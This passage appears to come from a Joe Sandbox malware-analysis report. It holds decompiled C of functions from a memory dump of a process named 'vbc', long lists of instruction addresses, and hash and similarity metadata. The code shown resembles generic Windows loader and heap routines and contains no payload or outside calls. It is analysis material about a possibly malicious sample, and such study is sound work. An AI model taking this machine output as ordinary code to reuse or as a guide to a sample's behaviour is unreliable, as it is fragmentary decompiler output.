																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L015C8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E015F3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                  0x015cd5f2
                                                  0x015cd5f5
                                                  0x015cd5f5
                                                  0x015cd5fd
                                                  0x015cd600
                                                  0x015cd60a
                                                  0x015cd60d
                                                  0x015cd617
                                                  0x015cd61d
                                                  0x015cd627
                                                  0x015cd62e
                                                  0x015cd911
                                                  0x015cd913
                                                  0x00000000
                                                  0x015cd919
                                                  0x015cd919
                                                  0x015cd919
                                                  0x015cd634
                                                  0x015cd634
                                                  0x015cd634
                                                  0x015cd634
                                                  0x015cd640
                                                  0x015cd8bf
                                                  0x00000000
                                                  0x015cd646
                                                  0x015cd646
                                                  0x015cd64d
                                                  0x015cd652
                                                  0x0161b2fc
                                                  0x0161b2fc
                                                  0x0161b302
                                                  0x0161b33b
                                                  0x0161b341
                                                  0x00000000
                                                  0x0161b304
                                                  0x0161b304
                                                  0x0161b319
                                                  0x0161b31e
                                                  0x0161b324
                                                  0x0161b326
                                                  0x0161b332
                                                  0x0161b347
                                                  0x0161b34c
                                                  0x0161b351
                                                  0x0161b35a
                                                  0x00000000
                                                  0x0161b328
                                                  0x0161b328
                                                  0x00000000
                                                  0x0161b328
                                                  0x0161b326
                                                  0x015cd658
                                                  0x015cd658
                                                  0x015cd65b
                                                  0x015cd665
                                                  0x00000000
                                                  0x015cd66b
                                                  0x015cd66b
                                                  0x015cd66b
                                                  0x015cd66b
                                                  0x015cd66d
                                                  0x015cd672
                                                  0x015cd67a
                                                  0x00000000
                                                  0x00000000
                                                  0x015cd680
                                                  0x015cd686
                                                  0x015cd8ce
                                                  0x015cd8d4
                                                  0x015cd8dd
                                                  0x015cd8e0
                                                  0x015cd68c
                                                  0x015cd691
                                                  0x015cd69d
                                                  0x015cd6a2
                                                  0x015cd6a7
                                                  0x015cd6b0
                                                  0x015cd6b5
                                                  0x015cd6e0
                                                  0x015cd6b7
                                                  0x015cd6b7
                                                  0x015cd6b9
                                                  0x015cd6b9
                                                  0x015cd6bb
                                                  0x015cd6bd
                                                  0x015cd6ce
                                                  0x015cd6d0
                                                  0x015cd6d2
                                                  0x0161b363
                                                  0x0161b365
                                                  0x00000000
                                                  0x0161b36b
                                                  0x00000000
                                                  0x0161b36b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015cd6bf
                                                  0x015cd6bf
                                                  0x015cd6e5
                                                  0x015cd6e7
                                                  0x015cd6e9
                                                  0x015cd6ec
                                                  0x015cd6ec
                                                  0x015cd6ef
                                                  0x015cd6f5
                                                  0x015cd6f9
                                                  0x015cd6fb
                                                  0x015cd6fd
                                                  0x015cd701
                                                  0x015cd703
                                                  0x015cd70a
                                                  0x015cd70a
                                                  0x015cd701
                                                  0x015cd710
                                                  0x015cd710
                                                  0x015cd6c1
                                                  0x015cd6c1
                                                  0x015cd6c6
                                                  0x0161b36d
                                                  0x0161b36f
                                                  0x00000000
                                                  0x0161b375
                                                  0x0161b375
                                                  0x0161b375
                                                  0x00000000
                                                  0x0161b375
                                                  0x00000000
                                                  0x015cd6cc
                                                  0x015cd6d8
                                                  0x015cd6d8
                                                  0x015cd6d8
                                                  0x00000000
                                                  0x015cd6c6
                                                  0x015cd6bf
                                                  0x00000000
                                                  0x015cd6da
                                                  0x015cd6da
                                                  0x015cd716
                                                  0x015cd71b
                                                  0x015cd720
                                                  0x015cd726
                                                  0x015cd726
                                                  0x015cd72d
                                                  0x00000000
                                                  0x015cd733
                                                  0x015cd739
                                                  0x015cd742
                                                  0x015cd750
                                                  0x015cd758
                                                  0x015cd764
                                                  0x015cd776
                                                  0x015cd77a
                                                  0x015cd783
                                                  0x015cd928
                                                  0x015cd92c
                                                  0x015cd93d
                                                  0x015cd944
                                                  0x015cd94f
                                                  0x015cd954
                                                  0x015cd956
                                                  0x015cd95f
                                                  0x015cd961
                                                  0x015cd973
                                                  0x015cd973
                                                  0x015cd956
                                                  0x015cd944
                                                  0x015cd92c
                                                  0x015cd78b
                                                  0x0161b394
                                                  0x015cd791
                                                  0x015cd798
                                                  0x0161b3a3
                                                  0x0161b3bb
                                                  0x0161b3bb
                                                  0x015cd7a5
                                                  0x015cd866
                                                  0x015cd870
                                                  0x015cd892
                                                  0x015cd898
                                                  0x015cd89e
                                                  0x015cd8a0
                                                  0x015cd8a6
                                                  0x015cd8ac
                                                  0x015cd8ae
                                                  0x015cd8b4
                                                  0x015cd8b4
                                                  0x015cd8ae
                                                  0x015cd7a5
                                                  0x015cd78b
                                                  0x015cd7b1
                                                  0x0161b3c5
                                                  0x0161b3c5
                                                  0x015cd7c3
                                                  0x015cd7ca
                                                  0x015cd7e5
                                                  0x015cd7eb
                                                  0x015cd8eb
                                                  0x015cd8ed
                                                  0x00000000
                                                  0x015cd8f3
                                                  0x015cd8f3
                                                  0x015cd8f3
                                                  0x00000000
                                                  0x015cd8ed
                                                  0x015cd7cc
                                                  0x015cd7cc
                                                  0x015cd7d2
                                                  0x00000000
                                                  0x015cd7d4
                                                  0x015cd7d4
                                                  0x015cd7d7
                                                  0x015cd7df
                                                  0x0161b3d4
                                                  0x0161b3d9
                                                  0x0161b3dc
                                                  0x0161b3dc
                                                  0x0161b3df
                                                  0x0161b3e2
                                                  0x0161b468
                                                  0x0161b46d
                                                  0x0161b46f
                                                  0x0161b46f
                                                  0x0161b475
                                                  0x015cd8f8
                                                  0x015cd8f9
                                                  0x015cd8fd
                                                  0x0161b3e8
                                                  0x0161b3e8
                                                  0x0161b3eb
                                                  0x0161b3ed
                                                  0x00000000
                                                  0x0161b3ef
                                                  0x0161b3ef
                                                  0x0161b3f1
                                                  0x0161b3f4
                                                  0x0161b3fe
                                                  0x0161b404
                                                  0x0161b409
                                                  0x0161b40e
                                                  0x0161b410
                                                  0x0161b410
                                                  0x0161b414
                                                  0x0161b414
                                                  0x0161b41b
                                                  0x0161b420
                                                  0x0161b423
                                                  0x0161b425
                                                  0x0161b427
                                                  0x0161b42a
                                                  0x0161b42d
                                                  0x0161b42d
                                                  0x0161b42a
                                                  0x0161b432
                                                  0x0161b436
                                                  0x0161b438
                                                  0x0161b43b
                                                  0x0161b43b
                                                  0x0161b449
                                                  0x0161b44e
                                                  0x0161b454
                                                  0x0161b458
                                                  0x0161b458
                                                  0x0161b45d
                                                  0x00000000
                                                  0x0161b45d
                                                  0x0161b3ed
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015cd7df
                                                  0x015cd7d2
                                                  0x015cd7ca
                                                  0x0161b37c
                                                  0x0161b37e
                                                  0x0161b385
                                                  0x0161b38a
                                                  0x00000000
                                                  0x0161b38a
                                                  0x015cd742
                                                  0x015cd7f1
                                                  0x015cd7f8
                                                  0x0161b49b
                                                  0x0161b49b
                                                  0x015cd800
                                                  0x015cd837
                                                  0x015cd843
                                                  0x015cd845
                                                  0x015cd847
                                                  0x015cd84a
                                                  0x015cd84b
                                                  0x015cd84e
                                                  0x015cd857
                                                  0x015cd818
                                                  0x015cd824
                                                  0x015cd831
                                                  0x0161b4a5
                                                  0x0161b4ab
                                                  0x0161b4b3
                                                  0x0161b4b8
                                                  0x0161b4bb
                                                  0x00000000
                                                  0x0161b4c1
                                                  0x0161b4c1
                                                  0x0161b4c8
                                                  0x00000000
                                                  0x0161b4ce
                                                  0x0161b4d4
                                                  0x0161b4e1
                                                  0x0161b4e3
                                                  0x0161b4e5
                                                  0x00000000
                                                  0x0161b4eb
                                                  0x0161b4f0
                                                  0x0161b4f2
                                                  0x015cdac9
                                                  0x015cdacc
                                                  0x015cdacf
                                                  0x015cdad1
                                                  0x015cdd78
                                                  0x015cdd78
                                                  0x015cdcf2
                                                  0x00000000
                                                  0x015cdad7
                                                  0x015cdad9
                                                  0x015cdadb
                                                  0x00000000
                                                  0x00000000
                                                  0x015cdae1
                                                  0x015cdae1
                                                  0x015cdae4
                                                  0x015cdae6
                                                  0x0161b4f9
                                                  0x0161b4f9
                                                  0x0161b500
                                                  0x015cdaec
                                                  0x015cdaec
                                                  0x015cdaf5
                                                  0x015cdaf8
                                                  0x015cdafb
                                                  0x015cdb03
                                                  0x015cdb11
                                                  0x015cdb16
                                                  0x015cdb19
                                                  0x015cdb1b
                                                  0x0161b52c
                                                  0x0161b531
                                                  0x0161b534
                                                  0x015cdb21
                                                  0x015cdb21
                                                  0x015cdb24
                                                  0x015cdcd9
                                                  0x015cdce2
                                                  0x015cdce5
                                                  0x015cdd6a
                                                  0x015cdd6d
                                                  0x00000000
                                                  0x015cdd73
                                                  0x0161b51a
                                                  0x0161b51c
                                                  0x0161b51f
                                                  0x0161b524
                                                  0x00000000
                                                  0x0161b524
                                                  0x015cdce7
                                                  0x015cdce7
                                                  0x015cdce7
                                                  0x00000000
                                                  0x015cdce7
                                                  0x00000000
                                                  0x015cdb2a
                                                  0x015cdb2c
                                                  0x015cdb31
                                                  0x015cdb33
                                                  0x015cdb36
                                                  0x015cdb39
                                                  0x015cdb3b
                                                  0x015cdb66
                                                  0x015cdb66
                                                  0x015cdb3d
                                                  0x015cdb3d
                                                  0x015cdb3e
                                                  0x015cdb46
                                                  0x015cdb47
                                                  0x015cdb49
                                                  0x015cdb4c
                                                  0x015cdb53
                                                  0x015cdb55
                                                  0x015cdb58
                                                  0x015cdb5a
                                                  0x0161b50a
                                                  0x0161b50f
                                                  0x0161b512
                                                  0x015cdb60
                                                  0x015cdb60
                                                  0x015cdb63
                                                  0x015cdb63
                                                  0x00000000
                                                  0x015cdb63
                                                  0x015cdb5a
                                                  0x015cdb3b
                                                  0x015cdb24
                                                  0x015cdb69
                                                  0x015cdb69
                                                  0x015cdb6c
                                                  0x015cdb6f
                                                  0x015cdb74
                                                  0x0161b557
                                                  0x0161b557
                                                  0x0161b55e
                                                  0x015cdb7a
                                                  0x015cdb7c
                                                  0x015cdb7f
                                                  0x015cdb82
                                                  0x015cdb85
                                                  0x00000000
                                                  0x015cdb8b
                                                  0x015cdb8b
                                                  0x015cdb8d
                                                  0x015cdb9b
                                                  0x015cdb9b
                                                  0x015cdb9d
                                                  0x015cdba0
                                                  0x015cdba2
                                                  0x015cdba4
                                                  0x015cdba7
                                                  0x015cdba9
                                                  0x015cdbae
                                                  0x015cdbae
                                                  0x015cdbb1
                                                  0x015cdbb4
                                                  0x015cdbb4
                                                  0x015cdbb7
                                                  0x015cdbba
                                                  0x015cdcd2
                                                  0x015cdcd4
                                                  0x00000000
                                                  0x015cdbc0
                                                  0x015cdbc0
                                                  0x015cdbd2
                                                  0x015cdbd7
                                                  0x015cdbda
                                                  0x015cdbdd
                                                  0x015cdbdf
                                                  0x00000000
                                                  0x015cdbe5
                                                  0x015cdbe5
                                                  0x015cdbee
                                                  0x015cdbf1
                                                  0x0161b541
                                                  0x0161b544
                                                  0x00000000
                                                  0x0161b546
                                                  0x0161b546
                                                  0x00000000
                                                  0x0161b546
                                                  0x015cdbf7
                                                  0x015cdbf7
                                                  0x015cdbfd
                                                  0x015cdbfd
                                                  0x015cdbff
                                                  0x015cdc0b
                                                  0x015cdc15
                                                  0x015cdc1b
                                                  0x015cdc1d
                                                  0x015cdc21
                                                  0x015cdc21
                                                  0x015cdc23
                                                  0x015cdc23
                                                  0x015cdc26
                                                  0x015cdc29
                                                  0x015cdc2b
                                                  0x00000000
                                                  0x00000000
                                                  0x015cdc31
                                                  0x015cdc34
                                                  0x015cdc36
                                                  0x015cdcbf
                                                  0x015cdcbf
                                                  0x015cdcc2
                                                  0x00000000
                                                  0x015cdc3c
                                                  0x015cdc41
                                                  0x015cdc43
                                                  0x00000000
                                                  0x015cdc45
                                                  0x015cdc45
                                                  0x015cdc47
                                                  0x00000000
                                                  0x015cdc4d
                                                  0x015cdc4d
                                                  0x015cdc50
                                                  0x015cdc52
                                                  0x015cdc55
                                                  0x015cdcfa
                                                  0x015cdcfe
                                                  0x015cdd08
                                                  0x015cdd0a
                                                  0x015cdd0c
                                                  0x00000000
                                                  0x015cdd12
                                                  0x015cdd15
                                                  0x015cdd2d
                                                  0x015cdd2f
                                                  0x015cdd32
                                                  0x015cdd35
                                                  0x00000000
                                                  0x015cdd35
                                                  0x015cdc5b
                                                  0x015cdc5b
                                                  0x015cdc5e
                                                  0x015cdc61
                                                  0x015cdc64
                                                  0x015cdc67
                                                  0x015cdc67
                                                  0x015cdc6a
                                                  0x015cdc6c
                                                  0x015cdc8e
                                                  0x015cdc8e
                                                  0x015cdc91
                                                  0x015cdc93
                                                  0x015cdcce
                                                  0x015cdcce
                                                  0x015cdc95
                                                  0x015cdc9c
                                                  0x015cdc6e
                                                  0x015cdc72
                                                  0x015cdc75
                                                  0x015cdc77
                                                  0x015cdc79
                                                  0x0161b551
                                                  0x0161b551
                                                  0x00000000
                                                  0x015cdc7f
                                                  0x015cdc7f
                                                  0x015cdc81
                                                  0x00000000
                                                  0x015cdc83
                                                  0x015cdc86
                                                  0x015cdc88
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015cdc88
                                                  0x015cdc81
                                                  0x015cdc79
                                                  0x015cdc6c
                                                  0x015cdc55
                                                  0x015cdc47
                                                  0x015cdc43
                                                  0x00000000
                                                  0x015cdc36
                                                  0x015cdc23
                                                  0x00000000
                                                  0x015cdbff
                                                  0x015cdbf1
                                                  0x015cdbdf
                                                  0x015cdb8f
                                                  0x015cdb92
                                                  0x015cdb95
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015cdb95
                                                  0x015cdb8d
                                                  0x015cdb85
                                                  0x015cdb74
                                                  0x015cdc9f
                                                  0x015cdca2
                                                  0x015cdcb0
                                                  0x015cdcb0
                                                  0x015cdad1
                                                  0x0161b4e5
                                                  0x0161b4c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015cd831
                                                  0x00000000
                                                  0x015cd800
                                                  0x0161b47f
                                                  0x0161b485
                                                  0x00000000
                                                  0x0161b485
                                                  0x015cd665
                                                  0x015cd652
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94da70172a4940f987ea908b6b401a72b1473b5f0a952d90d6aa11df2173113c
                                                  • Instruction ID: bfa1ccd643b2570c84233d3171f2ace00c642cd444fff1cd50efbd9010613bc2
                                                  • Opcode Fuzzy Hash: 94da70172a4940f987ea908b6b401a72b1473b5f0a952d90d6aa11df2173113c
                                                  • Instruction Fuzzy Hash: 19E1C030A0125A8FEB25DFA8CC80B6DB7F2BF85704F0841ADD9099B295D774A991CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015C849B Relevance: .3, Instructions: 290COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E015C849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x168f9c0);
				E0160D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x16a7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E015CCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E015D2280( *[fs:0x30], 0x16a8550);
						_t139 =  *0x16a7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E015EF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E015CFFB0(_t193, _t235, 0x16a8550);
								L5:
								return E0160D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E015B1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x16a7b9c; // 0x0
							_t235 = L015D4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x16a7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E015EA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E015CFFB0(_t193, _t235, 0x16a8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L015D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L015D77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x16a7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x16a7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E015F37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x16a7b9c; // 0x0
									_t214 = L015D4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E015F37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x16a7b10 =  *0x16a7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x16a7b04 =  *0x16a7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L015D77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L015D77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x16a7b08 =  *0x16a7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E015F57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E015FF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L015D77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E015EA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L015D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E015F96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                  0x015c849b
                                                  0x015c849b
                                                  0x015c849b
                                                  0x015c849b
                                                  0x015c849d
                                                  0x015c84a2
                                                  0x015c84a7
                                                  0x015c84b1
                                                  0x015c84d8
                                                  0x00000000
                                                  0x015c84b3
                                                  0x015c84c4
                                                  0x015c84c9
                                                  0x015c84cd
                                                  0x015c84cf
                                                  0x015c84cf
                                                  0x015c84d6
                                                  0x015c84e6
                                                  0x015c84e9
                                                  0x015c84ec
                                                  0x015c84ef
                                                  0x015c84f2
                                                  0x015c84f4
                                                  0x015c84fc
                                                  0x015c8501
                                                  0x015c8506
                                                  0x015c8509
                                                  0x015c86e0
                                                  0x015c86e5
                                                  0x015c86e8
                                                  0x015c86ed
                                                  0x015c86f0
                                                  0x015c86f2
                                                  0x01619afd
                                                  0x01619b02
                                                  0x015c84da
                                                  0x015c84df
                                                  0x015c84df
                                                  0x015c86fa
                                                  0x015c86fd
                                                  0x015c86fe
                                                  0x015c8701
                                                  0x015c8706
                                                  0x015c8709
                                                  0x015c870b
                                                  0x00000000
                                                  0x00000000
                                                  0x015c8711
                                                  0x015c8725
                                                  0x015c8727
                                                  0x015c872a
                                                  0x015c872c
                                                  0x01619af0
                                                  0x01619af5
                                                  0x015c8732
                                                  0x015c8732
                                                  0x015c8732
                                                  0x015c8735
                                                  0x015c8737
                                                  0x015c8515
                                                  0x015c8515
                                                  0x015c8518
                                                  0x015c851d
                                                  0x015c8523
                                                  0x015c8527
                                                  0x015c852b
                                                  0x015c8537
                                                  0x015c8539
                                                  0x015c853c
                                                  0x015c853e
                                                  0x015c868c
                                                  0x015c8691
                                                  0x015c8699
                                                  0x015c869b
                                                  0x015c8744
                                                  0x015c8748
                                                  0x015c86a1
                                                  0x015c86a1
                                                  0x015c86a1
                                                  0x015c86a4
                                                  0x015c86a8
                                                  0x01619bdf
                                                  0x01619bdf
                                                  0x015c86ae
                                                  0x015c86b0
                                                  0x00000000
                                                  0x015c86b6
                                                  0x00000000
                                                  0x01619be9
                                                  0x015c86b0
                                                  0x015c8544
                                                  0x015c854a
                                                  0x015c854d
                                                  0x015c8551
                                                  0x015c876e
                                                  0x015c8778
                                                  0x015c877b
                                                  0x015c8780
                                                  0x015c8557
                                                  0x015c8557
                                                  0x015c855d
                                                  0x015c855d
                                                  0x015c856b
                                                  0x015c856e
                                                  0x015c8570
                                                  0x015c8573
                                                  0x015c8576
                                                  0x015c8576
                                                  0x015c8579
                                                  0x015c857b
                                                  0x00000000
                                                  0x00000000
                                                  0x015c8581
                                                  0x015c85a0
                                                  0x015c85a2
                                                  0x015c85a5
                                                  0x015c85a7
                                                  0x01619b1b
                                                  0x01619b1b
                                                  0x015c862e
                                                  0x015c862e
                                                  0x015c8631
                                                  0x015c8631
                                                  0x015c8634
                                                  0x015c8636
                                                  0x015c8669
                                                  0x015c8669
                                                  0x015c866b
                                                  0x01619bbf
                                                  0x01619bc4
                                                  0x01619bc8
                                                  0x01619bce
                                                  0x01619bce
